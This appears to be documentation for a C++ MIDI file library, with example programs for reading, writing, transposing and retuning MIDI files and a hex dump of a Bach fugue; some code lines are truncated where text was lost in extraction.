\nTPQ: 120\nTRACKS: 3\nTICK    DELTA   TRACK   MIDI MESSAGE\n____________________________________\n0\t0\t1\t90 48 40\n0\t0\t2\t90 30 40\n0\t0\t0\tff 2f 0\n120\t120\t1\t80 48 40\n120\t0\t2\t80 30 40\n120\t0\t2\t90 3c 40\n120\t0\t1\t90 48 40\n240\t120\t2\t80 3c 40\n240\t0\t1\t80 48 40\n240\t0\t2\t90 40 40\n240\t0\t1\t90 4f 40\n360\t120\t2\t80 40 40\n360\t0\t1\t80 4f 40\n360\t0\t1\t90 4f 40\n360\t0\t2\t90 3c 40\n480\t120\t2\t80 3c 40\n480\t0\t1\t80 4f 40\n480\t0\t2\t90 41 40\n480\t0\t1\t90 51 40\n600\t120\t2\t80 41 40\n600\t0\t1\t80 51 40\n600\t0\t1\t90 51 40\n600\t0\t2\t90 3c 40\n720\t120\t1\t80 51 40\n720\t0\t2\t80 3c 40\n720\t0\t2\t90 40 40\n720\t0\t1\t90 4f 40\n840\t120\t2\t80 40 40\n840\t0\t2\t90 3c 40\n960\t120\t2\t80 3c 40\n960\t0\t1\t80 4f 40\n960\t0\t2\t90 3e 40\n960\t0\t1\t90 4d 40\n1080\t120\t1\t80 4d 40\n1080\t0\t2\t80 3e 40\n1080\t0\t2\t90 3b 40\n1080\t0\t1\t90 4d 40\n1200\t120\t1\t80 4d 40\n1200\t0\t2\t80 3b 40\n1200\t0\t2\t90 3c 40\n1200\t0\t1\t90 4c 40\n1320\t120\t1\t80 4c 40\n1320\t0\t2\t80 3c 40\n1320\t0\t1\t90 4c 40\n1320\t0\t2\t90 39 40\n1440\t120\t1\t80 4c 40\n1440\t0\t2\t80 39 40\n1440\t0\t1\t90 4a 40\n1440\t0\t2\t90 35 40\n1560\t120\t1\t80 4a 40\n1560\t0\t2\t80 35 40\n1560\t0\t2\t90 37 40\n1560\t0\t1\t90 4a 40\n1680\t120\t1\t80 4a 40\n1680\t0\t2\t80 37 40\n1680\t0\t2\t90 30 40\n1680\t0\t1\t90 48 40\n1920\t240\t1\t80 48 40\n1920\t0\t2\t80 30 40\n1920\t0\t1\tff 2f 0\n1920\t0\t2\tff 2f 0\n
\n\n\n\nMIDI file writing example\n--------------------------\n\nBelow is an example program to create a MIDI file. This program will\ngenerate a random sequence of notes and append them to the end of\nthe track. By default a `MidiFile` object contains a single track and\nwill be written as a type-0 MIDI file unless more tracks are added. After\nadding notes to the track, it must be sorted into time sequence\nbefore being written to a file.\n\n\n``` cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include \n#include \n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.define(\"n|note-count=i:10\", \"How many notes to randomly play\");\n options.define(\"o|output-file=s\", \"Output filename (stdout if none)\");\n options.define(\"i|instrument=i:0\", \"General MIDI instrument number\");\n options.define(\"x|hex=b\", \"Hex byte-code output\");\n options.process(argc, argv);\n\n random_device rd;\n mt19937 mt(rd());\n uniform_int_distribution starttime(0, 100);\n uniform_int_distribution duration(1, 8);\n uniform_int_distribution pitch(36, 84);\n uniform_int_distribution velocity(40, 100);\n\n MidiFile midifile;\n int track = 0;\n int channel = 0;\n int instr = options.getInteger(\"instrument\");\n midifile.addTimbre(track, 0, channel, instr);\n\n int tpq = midifile.getTPQ();\n int count = options.getInteger(\"note-count\");\n for (int i=0; i\n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n if (argc != 3) return 1;\n MidiFile midifile;\n midifile.read(argv[1]);\n if (midifile.status()) midifile.write(argv[2]);\n else cerr << \"Problem reading MIDI file \" << argv[1] << endl;\n}\n```\n\nThe `MidiFile::read()` function will automatically identify if the\ninput is a binary standard MIDI file, a hex byte-code representation,\nor a generalized binasc syntax file (which includes byte-codes).\nThe `MidiFile::status()` function can be checked after reading a MIDI\nfile to determine if the file was read without problems.\n\n\nCode snippets\n-------------\n\n\n### How to process multiple input files and get duration of MIDI files ###\n\nThis example uses the `MidiFile::getFileDurationInSeconds()` to calculate the\nduration of a MIDI file. Also, this example shows how to process multiple\ninput files when using the Options class.\n\n```cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include \nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.process(argc, argv);\n MidiFile midifile;\n if (options.getArgCount() == 0) {\n midifile.read(cin);\n cout << midifile.getFileDurationInSeconds() << \" seconds\" << endl;\n } else {\n int count = options.getArgCount();\n for (int i=0; i 1) cout << filename << \"\\t\";\n midifile.read(filename);\n cout << midifile.getFileDurationInSeconds() << \" seconds\" << endl;\n }\n }\n return 0;\n}\n```\n\n\n\n### How to extract text meta-messages from a MIDI file. ###\n\nThe `MidiMessage::isText()` function will return true if the message\nis a text meta-message. The following program merges all tracks into\na single list and does one loop checking for text meta-messages, printing\nthem out when found. The `MidiMessage::getMetaContent()` function extracts\nthe text string of the message from the raw MIDI file bytes.\n\n```cpp\n#include \"MidiFile.h\"\n#include \n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n MidiFile midifile;\n if (argc == 1) midifile.read(cin);\n else midifile.read(argv[1]);\n if (!midifile.status()) {\n cerr << \"Problem reading MIDI file\" << endl;\n return 1;\n }\n\n midifile.joinTracks();\n for (int i=0; i\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n if (argc != 3) {\n cerr << \"Usage: \" << argv[0] << \" input output\" << endl;\n return 1;\n }\n MidiFile midifile;\n midifile.read(argv[1]);\n if (!midifile.status()) {\n cerr << \"Problem reading MIDI file\" << endl;\n return 1;\n }\n\n midifile.joinTracks();\n midifile.write(argv[2]);\n\n return 0;\n}\n\n```\n\nThe `.joinTracks()` function merges all tracks into a single track. And if\na `MidiFile` object has only one track when it is being written, it will be\nwritten as a type-0 (single-track) MIDI file.\n\n\n\n### How to check for a drum track in a MIDI file ###\n\nIn General MIDI files, the drum track is on the 10th channel, which is\nrepresented by the integer 9. The following example searches through\nthe MIDI events in each track until it finds a note on channel 9:\n\n```cpp\n#include \"MidiFile.h\"\n#include \nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n MidiFile midifile;\n if (argc == 1) midifile.read(cin);\n else midifile.read(argv[1]);\n if (!midifile.status()) {\n cerr << \"Problem reading MIDI file\" << endl;\n return 1;\n }\n\n bool found = false;\n for (int i=0; i\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n if (argc != 3) {\n cerr << \"Usage: \" << argv[0] << \" input output\" << endl;\n return 1;\n }\n MidiFile midifile;\n midifile.read(argv[1]);\n if (!midifile.status()) {\n cerr << \"Problem reading MIDI file\" << endl;\n return 1;\n }\n\n for (int i=0; i\n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.define(\"t|transpose=i:0\", \"Semitones to transpose by\");\n options.process(argc, argv);\n\n MidiFile midifile;\n if (options.getArgCount() == 0) midifile.read(cin);\n else midifile.read(options.getArg(1));\n if (!midifile.status()) {\n cerr << \"Could not read MIDI file\" << endl;\n return 1;\n }\n\n int transpose = options.getInteger(\"transpose\");\n for (int i=0; i\n#include \n#include \n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.process(argc, argv);\n MidiFile midifile;\n if (options.getArgCount() == 0) midifile.read(cin);\n else midifile.read(options.getArg(1));\n if (!midifile.status()) {\n cerr << \"Could not read MIDI file\" << endl;\n return 1;\n }\n\n pair trackinst;\n set> iset;\n for (int i=0; i\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n if (argc != 3) {\n cerr << \"Usage: \" << argv[0] << \" input output\" << endl;\n return 1;\n }\n MidiFile midifile;\n midifile.read(argv[1]);\n if (!midifile.status()) {\n cerr << \"Problem reading MIDI file\" << endl;\n return 1;\n }\n\n midifile.joinTracks();\n for (int i=0; i= 9) pc++;\n midifile[0][i].setChannelNibble(pc);\n } else midifile[0][i].track = 13;\n }\n midifile.splitTracks();\n\n double maxbend = 200.0; // typical pitch-bend depth in cents on synthesizers\n // pythagorean tuning deviations from equal temperament in cents.\n vector pythagorean = {-3.91, 9.78, 0.00, -9.78, 3.91, -5.87, 7.82,\n -1.96, -11.73, 1.96, -7.82, 5.87};\n\n for (int i=0; i<12; i++) {\n int maxtrack = midifile.getTrackCount();\n int track = i+1;\n if (track >= maxtrack) break;\n int channel = i;\n if (i >= 9) channel++;\n double bend = pythagorean[i] / maxbend;\n MidiEvent* me = midifile.addPitchBend(track, 0, channel, bend);\n me->seq = 1;\n }\n\n midifile.sortTracks();\n midifile.write(argv[2]);\n\n return 0;\n}\n```\n\nThe `MidiFile::splitTracks()` function will generate 13 or 14 tracks. Track 0\nwill contain all non-note MIDI messages from the original file, while tracks\n1 to 12 will contain notes of a specific pitch-class on MIDI channels 1-12,\nskipping channel 10 (the General MIDI percussion channel). Percussion notes\nwill be placed in track 13, but remain on channel 10.\n\nThe use of `MidiEvent::seq` being set to 1 and 2 in the program is used to\nforce the first notes at tick time 0 to be placed after the pitch bend\nmessages inserted at the same timestamp when `MidiFile::sortTracks()`\nis called (events with a lower sequence number will be placed before those\nwith a higher number if they occur at the same time in a track when sorting\nthe events in the track). The pitch-bend messages would probably be sorted\nbefore the notes anyway, but using `seq` should guarantee they are placed\nbefore the first notes.\n\nTry this program on Bach's Well-Tempered Clavier, Book I, Fugue No. 4\nin C-sharp minor:\n\n```\n4d 54 68 64 00 00 00 06 00 01 00 06 00 78 4d 54 72 6b 00 00 00 13 00 ff 51 03 08 8e 6c 00 ff 58 04 02 01 30 08 00 ff 2f\n00 4d 54 72 6b 00 00 09 bd b2 50 90 49 40 81 70 80 49 40 00 90 48 40 81 70 80 48 40 00 90 4c 40 81 70 80 4c 40 00 90 4b\n40 83 60 80 4b 40 00 90 49 40 82 68 80 49 40 00 90 4b 40 78 80 4b 40 00 90 4c 40 78 80 4c 40 00 90 4b 40 78 80 4b 40 00\n90 49 40 81 70 80 49 40 00 90 47 40 81 70 80 47 40 00 90 49 40 81 70 80 49 40 00 90 4b 40 81 70 80 4b 40 82 68 90 4c 40\n78 80 4c 40 00 90 4b 40 78 80 4b 40 00 90 49 40 78 80 49 40 00 90 47 40 78 80 47 40 00 90 4b 40 78 80 4b 40 00 90 50 40\n82 68 80 50 40 00 90 4e 40 78 80 4e 40 00 90 50 40 78 80 50 40 00 90 51 40 78 80 51 40 00 90 53 40 84 58 80 53 40 00 90\n51 40 78 80 51 40 00 90 50 40 78 80 50 40 00 90 4e 40 78 80 4e 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90\n4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 49 40 83 60 80 49 40 00 90 47 40 82 68 80 47 40 00 90 49 40 78 80 49 40\n00 90 47 40 78 80 47 40 00 90 45 40 78 80 45 40 00 90 44 40 81 70 80 44 40 00 90 46 40 78 80 46 40 00 90 47 40 78 80 47\n40 00 90 49 40 81 70 80 49 40 00 90 47 40 83 60 80 47 40 00 90 46 40 81 70 80 46 40 00 90 47 40 84 58 80 47 40 00 90 49\n40 78 80 49 40 00 90 4b 40 78 80 4b 40 00 90 4c 40 78 80 4c 40 00 90 4c 40 81 70 80 4c 40 00 90 4b 40 81 70 80 4b 40 00\n90 4c 40 78 80 4c 40 00 90 4b 40 78 80 4b 40 00 90 4c 40 78 80 4c 40 00 90 4e 40 78 80 4e 40 00 90 50 40 3c 80 50 40 00\n90 4e 40 3c 80 4e 40 00 90 50 40 3c 80 50 40 00 90 51 40 3c 80 51 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00\n90 4c 40 3c 80 4c 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4e 40 3c 80 4e 40 00\n90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 4e 40 3c 80 4e 40 00\n90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 4c 40 3c 80 4c 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00\n90 4b 40 3c 80 4b 40 00 90 49 40 3c 80 49 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 49 40 3c 80 49 40 00\n90 4b 40 3c 80 4b 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00\n90 4b 40 3c 80 4b 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 49 40 3c 80 49 40 00 90 4b 40 3c 80 4b 40 00\n90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 46 40 3c 80 46 40 00 90 49 40 3c 80 49 40 00 90 47 40 82 2c 80 47 40\n00 90 49 40 3c 80 49 40 00 90 4b 40 3c 80 4b 40 00 90 47 40 3c 80 47 40 00 90 49 40 82 68 80 49 40 00 90 4c 40 78 80 4c\n40 00 90 4b 40 82 68 80 4b 40 00 90 4e 40 78 80 4e 40 00 90 4c 40 84 58 80 4c 40 00 90 4b 40 81 70 80 4b 40 00 90 49 40\n81 70 80 49 40 00 90 48 40 3c 80 48 40 00 90 46 40 3c 80 46 40 00 90 48 40 78 80 48 40 00 90 4b 40 78 80 4b 40 00 90 50\n40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 50 40 3c 80 50 40 00 90 51 40 3c 80 51 40 00 90 50 40 3c 80 50 40 00 90 4e\n40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4e\n40 3c 80 4e 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 4e\n40 3c 80 4e 40 00 90 4d 40 81 70 80 4d 40 00 90 51 40 81 70 80 51 40 00 90 50 40 84 58 80 50 40 00 90 4e 40 3c 80 4e 40\n00 90 4c 40 3c 80 4c 40 00 90 4a 40 81 70 80 4a 40 78 90 49 40 78 80 49 40 00 90 4e 40 78 80 4e 40 00 90 4e 40 78 80 4e\n40 00 90 4e 40 78 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4a 40 3c 80 4a 40 00 90 4c 40 82 68 80 4c 40 00 90 4a 40 3c 80\n4a 40 00 90 49 40 3c 80 49 40 00 90 4a 40 83 60 80 4a 40 00 90 49 40 81 70 80 49 40 00 90 4e 40 81 70 80 4e 40 00 90 4c\n40 81 70 80 4c 40 00 90 4c 40 81 34 80 4c 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4a 40 3c 80 4a 40 00\n90 49 40 3c 80 49 40 00 90 4c 40 3c 80 4c 40 00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40 00 90 4a 40 3c 80 4a 40 00\n90 4c 40 3c 80 4c 40 00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 4a 40 3c 80 4a 40 00\n90 49 40 83 60 80 49 40 00 90 48 40 81 70 80 48 40 00 90 4c 40 81 70 80 4c 40 00 90 4b 40 84 58 80 4b 40 00 90 44 40 78\n80 44 40 00 90 49 40 78 80 49 40 00 90 49 40 78 80 49 40 00 90 49 40 78 80 49 40 00 90 47 40 3c 80 47 40 00 90 45 40 3c\n80 45 40 00 90 47 40 83 60 80 47 40 00 90 45 40 81 70 80 45 40 00 90 44 40 81 70 80 44 40 81 70 90 4b 40 83 60 80 4b 40\n00 90 4a 40 81 70 80 4a 40 00 90 4e 40 81 70 80 4e 40 00 90 4d 40 81 70 80 4d 40 00 90 4c 40 81 70 80 4c 40 00 90 4b 40\n3c 80 4b 40 00 90 49 40 3c 80 49 40 00 90 4b 40 3c 80 4b 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 49 40\n3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 4b 40 3c 80 4b 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 49 40\n3c 80 49 40 00 90 4b 40 3c 80 4b 40 00 90 49 40 3c 80 49 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 49 40\n3c 80 49 40 00 90 48 40 81 70 80 48 40 00 90 47 40 81 70 80 47 40 00 90 46 40 81 70 80 46 40 00 90 45 40 81 70 80 45 40\n00 90 44 40 81 70 80 44 40 89 30 90 49 40 83 60 80 49 40 00 90 48 40 81 70 80 48 40 00 90 4c 40 81 70 80 4c 40 00 90 4b\n40 85 50 80 4b 40 00 90 49 40 83 60 80 49 40 00 90 48 40 81 70 80 48 40 78 90 49 40 3c 80 49 40 00 90 4b 40 3c 80 4b 40\n00 90 4c 40 78 80 4c 40 00 90 4e 40 78 80 4e 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 50 40 3c 80 50 40\n00 90 51 40 3c 80 51 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 50 40 3c 80 50 40\n00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4e 40 3c 80 4e 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40\n00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40\n00 90 4c 40 3c 80 4c 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40\n00 90 4c 40 3c 80 4c 40 00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40 00 90 4a 40 3c 80 4a 40 00 90 4c 40 3c 80 4c 40\n00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40\n00 90 47 40 3c 80 47 40 00 90 49 40 3c 80 49 40 00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40\n00 90 45 40 3c 80 45 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 45 40 3c 80 45 40 00 90 47 40 3c 80 47 40\n00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 45 40 3c 80 45 40 00 90 44 40 3c 80 44 40 00 90 47 40 3c 80 47 40\n00 90 45 40 81 70 80 45 40 81 70 90 49 40 83 60 80 49 40 00 90 48 40 81 70 80 48 40 00 90 4c 40 81 70 80 4c 40 00 90 4b\n40 84 58 80 4b 40 00 90 49 40 78 80 49 40 00 90 50 40 78 80 50 40 00 90 50 40 78 80 50 40 00 90 50 40 78 80 50 40 00 90\n4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4e 40 81 70 80 4e 40 00 90 4c 40 83 60 80 4c 40 00 90 4b 40 81 70 80 4b\n40 00 90 4f 40 81 70 80 4f 40 00 90 4e 40 81 70 80 4e 40 00 90 42 40 81 70 80 42 40 00 90 41 40 81 70 80 41 40 00 90 45\n40 81 70 80 45 40 00 90 44 40 78 80 44 40 83 60 90 48 40 78 80 48 40 00 90 4e 40 78 80 4e 40 00 90 4e 40 78 80 4e 40 00\n90 4e 40 78 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 4c 40 78 80 4c 40 00 90 4b 40 3c 80 4b 40 00\n90 49 40 3c 80 49 40 00 90 4b 40 78 80 4b 40 00 90 48 40 78 80 48 40 00 90 49 40 85 50 80 49 40 00 90 48 40 81 70 80 48\n40 00 90 47 40 81 70 80 47 40 00 90 46 40 81 70 80 46 40 00 90 45 40 81 70 80 45 40 00 90 44 40 83 60 80 44 40 00 90 46\n40 81 70 80 46 40 00 90 48 40 81 70 80 48 40 00 90 49 40 83 60 80 49 40 00 90 48 40 81 70 80 48 40 00 90 4c 40 83 60 80\n4c 40 00 90 4b 40 78 80 4b 40 00 90 49 40 78 80 49 40 00 90 48 40 81 70 80 48 40 00 90 49 40 83 60 80 49 40 00 90 48 40\n81 70 80 48 40 00 90 49 40 8f 00 80 49 40 77 90 00 00 00 ff 2f 00 4d 54 72 6b 00 00 09 40 ab 10 91 44 40 81 70 81 44 40\n00 91 41 40 81 70 81 41 40 00 91 45 40 81 70 81 45 40 00 91 44 40 81 70 81 44 40 00 91 42 40 83 60 81 42 40 00 91 49 40\n83 60 81 49 40 00 91 47 40 83 60 81 47 40 00 91 45 40 81 70 81 45 40 00 91 44 40 81 70 81 44 40 00 91 45 40 82 68 81 45\n40 00 91 44 40 78 81 44 40 00 91 42 40 78 81 42 40 00 91 40 40 78 81 40 40 00 91 3f 40 81 70 81 3f 40 00 91 44 40 81 70\n81 44 40 00 91 44 40 81 70 81 44 40 00 91 43 40 81 70 81 43 40 00 91 44 40 81 70 81 44 40 00 91 3b 40 81 70 81 3b 40 00\n91 3d 40 82 68 81 3d 40 00 91 3d 40 78 81 3d 40 00 91 3f 40 78 81 3f 40 00 91 3d 40 78 81 3d 40 00 91 3f 40 78 81 3f 40\n00 91 41 40 78 81 41 40 00 91 42 40 81 70 81 42 40 00 91 45 40 81 70 81 45 40 00 91 44 40 81 70 81 44 40 3c 91 47 40 3c\n81 47 40 00 91 45 40 3c 81 45 40 00 91 44 40 3c 81 44 40 00 91 42 40 78 81 42 40 00 91 45 40 78 81 45 40 00 91 44 40 78\n81 44 40 00 91 42 40 78 81 42 40 00 91 41 40 81 70 81 41 40 00 91 42 40 82 68 81 42 40 00 91 40 40 84 58 81 40 40 00 91\n3f 40 81 70 81 3f 40 00 91 40 40 84 58 81 40 40 00 91 3f 40 78 81 3f 40 00 91 40 40 78 81 40 40 00 91 42 40 3c 81 42 40\n00 91 44 40 3c 81 44 40 00 91 42 40 81 70 81 42 40 00 91 47 40 82 68 81 47 40 00 91 49 40 78 81 49 40 00 91 47 40 78 81\n47 40 00 91 45 40 78 81 45 40 00 91 44 40 81 70 81 44 40 a1 60 91 49 40 81 70 81 49 40 00 91 48 40 81 70 81 48 40 00 91\n4c 40 81 70 81 4c 40 00 91 4b 40 85 50 81 4b 40 00 91 49 40 83 60 81 49 40 00 91 48 40 78 81 48 40 00 91 47 40 81 34 81\n47 40 00 91 47 40 3c 81 47 40 00 91 49 40 3c 81 49 40 00 91 4a 40 3c 81 4a 40 00 91 49 40 3c 81 49 40 00 91 47 40 3c 81\n47 40 00 91 45 40 3c 81 45 40 00 91 49 40 3c 81 49 40 00 91 47 40 3c 81 47 40 00 91 45 40 3c 81 45 40 00 91 47 40 3c 81\n47 40 00 91 49 40 3c 81 49 40 00 91 47 40 3c 81 47 40 00 91 45 40 3c 81 45 40 00 91 44 40 3c 81 44 40 00 91 47 40 3c 81\n47 40 00 91 45 40 82 2c 81 45 40 00 91 49 40 3c 81 49 40 00 91 47 40 3c 81 47 40 00 91 45 40 3c 81 45 40 00 91 44 40 81\n70 81 44 40 87 40 91 45 40 81 70 81 45 40 00 91 44 40 81 70 81 44 40 00 91 49 40 81 70 81 49 40 00 91 47 40 84 58 81 47\n40 00 91 40 40 78 81 40 40 00 91 45 40 78 81 45 40 00 91 45 40 78 81 45 40 00 91 45 40 78 81 45 40 00 91 44 40 3c 81 44\n40 00 91 42 40 3c 81 42 40 00 91 44 40 82 68 81 44 40 00 91 3d 40 3c 81 3d 40 00 91 3f 40 3c 81 3f 40 00 91 40 40 78 81\n40 40 00 91 42 40 78 81 42 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c 81 42 40 00 91 44 40 3c 81 44 40 00 91 45 40 3c 81\n45 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c 81\n42 40 00 91 40 40 3c 81 40 40 00 91 42 40 3c 81 42 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81\n40 40 00 91 3f 40 3c 81 3f 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 3f 40 3c 81 3f 40 00 91 40 40 3c 81\n40 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 3f 40 3c 81 3f 40 00 91 3d 40 3c 81 3d 40 00 91 40 40 3c 81\n40 40 00 91 3f 40 3c 81 3f 40 00 91 3d 40 3c 81 3d 40 00 91 3f 40 3c 81 3f 40 00 91 40 40 3c 81 40 40 00 91 3e 40 3c 81\n3e 40 00 91 3d 40 3c 81 3d 40 00 91 3b 40 3c 81 3b 40 00 91 3e 40 3c 81 3e 40 00 91 3d 40 3c 81 3d 40 00 91 3b 40 3c 81\n3b 40 00 91 3d 40 3c 81 3d 40 00 91 3e 40 3c 81 3e 40 00 91 3d 40 3c 81 3d 40 00 91 40 40 3c 81 40 40 00 91 3f 40 3c 81\n3f 40 00 91 3d 40 3c 81 3d 40 00 91 48 40 81 70 81 48 40 00 91 3d 40 81 70 81 3d 40 00 91 3f 40 78 81 3f 40 00 91 3f 40\n78 81 3f 40 00 91 44 40 3c 81 44 40 00 91 46 40 3c 81 46 40 00 91 47 40 81 70 81 47 40 00 91 46 40 78 81 46 40 00 91 4b\n40 78 81 4b 40 00 91 4b 40 78 81 4b 40 00 91 4b 40 78 81 4b 40 00 91 49 40 3c 81 49 40 00 91 48 40 3c 81 48 40 00 91 49\n40 83 60 81 49 40 00 91 47 40 81 70 81 47 40 00 91 46 40 81 70 81 46 40 00 91 45 40 82 68 81 45 40 00 91 3f 40 78 81 3f\n40 00 91 44 40 78 81 44 40 00 91 44 40 81 70 81 44 40 00 91 42 40 3c 81 42 40 00 91 41 40 3c 81 41 40 00 91 42 40 83 60\n81 42 40 00 91 40 40 81 70 81 40 40 00 91 3f 40 81 70 81 3f 40 00 91 3d 40 81 70 81 3d 40 00 91 3f 40 83 60 81 3f 40 84\n58 91 44 40 78 81 44 40 00 91 49 40 78 81 49 40 00 91 49 40 78 81 49 40 00 91 49 40 78 81 49 40 00 91 48 40 3c 81 48 40\n00 91 46 40 3c 81 46 40 00 91 48 40 3c 81 48 40 00 91 49 40 3c 81 49 40 00 91 4b 40 3c 81 4b 40 00 91 48 40 3c 81 48 40\n00 91 44 40 3c 81 44 40 00 91 42 40 3c 81 42 40 00 91 44 40 3c 81 44 40 00 91 45 40 3c 81 45 40 00 91 44 40 3c 81 44 40\n00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40\n00 91 42 40 3c 81 42 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 3f 40 3c 81 3f 40\n00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 44 40 3c 81 44 40 00 91 45 40 3c 81 45 40 00 91 47 40 3c 81 47 40\n00 91 49 40 3c 81 49 40 00 91 4b 40 3c 81 4b 40 00 91 48 40 3c 81 48 40 00 91 49 40 3c 81 49 40 00 91 4b 40 78 81 4b 40\n8b 20 91 42 40 78 81 42 40 00 91 47 40 78 81 47 40 00 91 47 40 78 81 47 40 00 91 47 40 78 81 47 40 00 91 45 40 3c 81 45\n40 00 91 44 40 3c 81 44 40 00 91 45 40 81 70 81 45 40 00 91 44 40 84 1c 81 44 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c\n81 42 40 00 91 41 40 3c 81 41 40 00 91 42 40 81 70 81 42 40 00 91 44 40 82 2c 81 44 40 00 91 44 40 3c 81 44 40 00 91 42\n40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 3f 40 3c 81 3f 40 00 91 45 40 3c 81 45 40 00 91 44 40 3c 81 44 40 00 91 42\n40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 44 40 3c 81 44 40 00 91 49 40 3c 81 49 40 00 91 47 40 3c 81 47 40 00 91 45\n40 3c 81 45 40 00 91 44 40 3c 81 44 40 00 91 45 40 3c 81 45 40 00 91 42 40 3c 81 42 40 00 91 44 40 82 68 81 44 40 00 91\n49 40 3c 81 49 40 00 91 48 40 3c 81 48 40 00 91 49 40 82 68 81 49 40 00 91 46 40 78 81 46 40 00 91 4b 40 78 81 4b 40 00\n91 4b 40 78 81 4b 40 00 91 4b 40 78 81 4b 40 00 91 49 40 3c 81 49 40 00 91 47 40 3c 81 47 40 00 91 49 40 81 70 81 49 40\n00 91 47 40 81 70 81 47 40 00 91 47 40 81 70 81 47 40 00 91 46 40 81 70 81 46 40 00 91 4a 40 81 70 81 4a 40 00 91 49 40\n83 60 81 49 40 78 91 44 40 78 81 44 40 00 91 49 40 78 81 49 40 00 91 49 40 78 81 49 40 00 91 49 40 78 81 49 40 00 91 48\n40 3c 81 48 40 00 91 46 40 3c 81 46 40 00 91 48 40 3c 81 48 40 00 91 49 40 3c 81 49 40 00 91 4b 40 81 70 81 4b 40 00 91\n49 40 3c 81 49 40 00 91 48 40 3c 81 48 40 00 91 49 40 81 70 81 49 40 00 91 42 40 81 70 81 42 40 00 91 44 40 83 60 81 44\n40 00 91 42 40 82 68 81 42 40 82 68 91 44 40 78 81 44 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 42 40 78\n81 42 40 00 91 42 40 78 81 42 40 00 91 42 40 78 81 42 40 00 91 40 40 3c 81 